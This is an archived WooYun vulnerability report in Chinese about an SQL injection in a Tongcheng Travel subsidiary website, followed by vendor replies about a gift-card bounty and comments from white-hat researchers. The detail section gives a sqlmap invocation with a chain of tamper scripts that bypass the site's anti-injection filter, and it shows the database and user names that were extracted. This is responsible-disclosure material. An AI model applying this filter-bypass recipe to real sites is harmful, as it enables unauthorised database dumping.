同程旅游旗下某旅游网站SQL注射漏洞危机该站数据(绕waf)

漏洞概要

缺陷编号:WooYun-2015-098572

漏洞标题:同程旅游旗下某旅游网站SQL注射漏洞危机该站数据(绕waf)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者:BMa

提交时间:2015-02-27 18:31

公开时间:2015-04-13 18:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

同程旅游某站拖走全网库
听说你们的rank很不错哦

详细说明:

注入:

参数:name存在过滤,使用tamperwww.tycts.com\sql1\1.txt -p name --risk 3 --tamper space2mssqlhash.py,space2hash.py,charencode.py,charunicodeencode.py,space2comment.py --current-db上图:current database: 'TCLine'

current user: '17uLXSLine'

可以拖走全网库,本来是想用count来看看的,奈何表太多了,弄一些证明一下:

漏洞证明:

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-02-2718:34

厂商回复:

感谢关注同程旅游,兄弟看你这一串tamper脚本,绕过辛苦了,稍后会安排寄出300京东礼品卡以示谢意。

最新状态:

2015-02-27:另,这也不是waf,他们自己搞的防注入,见笑了。

2015-02-27:pss 这是同程旗下的六合一旅行社系统,洞主你该发通用,你亏了。

评价

  1. 2010-01-01 00:00 Mik3y_14 白帽子 | Rank:33 漏洞数:2)

    厂商挺有趣的

  2. 2010-01-01 00:00 BMa 白帽子 | Rank:1666 漏洞数:121)

    @苏州同程旅游网络科技有限公司 我还没弄清楚你们之间的关系
    另外 我原来的标题不是这样的

  3. 2010-01-01 00:00 疯狗 白帽子 | Rank:22 漏洞数:2)

    @BMa 我跟厂商确认后改了下,因为域名,你懂得:)

  4. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    硬件waf:卧槽现在什么东西都能叫waf了,比如软件的xx狗和防注入代码

  5. 2010-01-01 00:00 BMa 白帽子 | Rank:1666 漏洞数:121)

    @苏州同程旅游网络科技有限公司 还有另外一个注入点,睡一觉起来,你们就给补了 - - !昨天动静太大了

  6. 2010-01-01 00:00 http://www.wooyun.org/corps/苏州同程旅游网络科技有限公司 白帽子 | Rank:0 漏洞数:0)

    @BMa 是切到软waf上了,哈。

  7. 2010-01-01 00:00 http://www.wooyun.org/corps/苏州同程旅游网络科技有限公司 白帽子 | Rank:0 漏洞数:0)

    @BMa 这次能绕过就是真的绕waf了,绕过500,连之前的300一起发。
    不过下次就不要说拖库什么的了,开发受到的压力会很大的。

  8. 2010-01-01 00:00 BMa 白帽子 | Rank:1666 漏洞数:121)

    @苏州同程旅游网络科技有限公司 我以为补了,没动了 有时间我再看看

  9. 2010-01-01 00:00 BMa 白帽子 | Rank:1666 漏洞数:121)

    @苏州同程旅游网络科技有限公司 京东卡已经收到 感谢厂商理解白帽子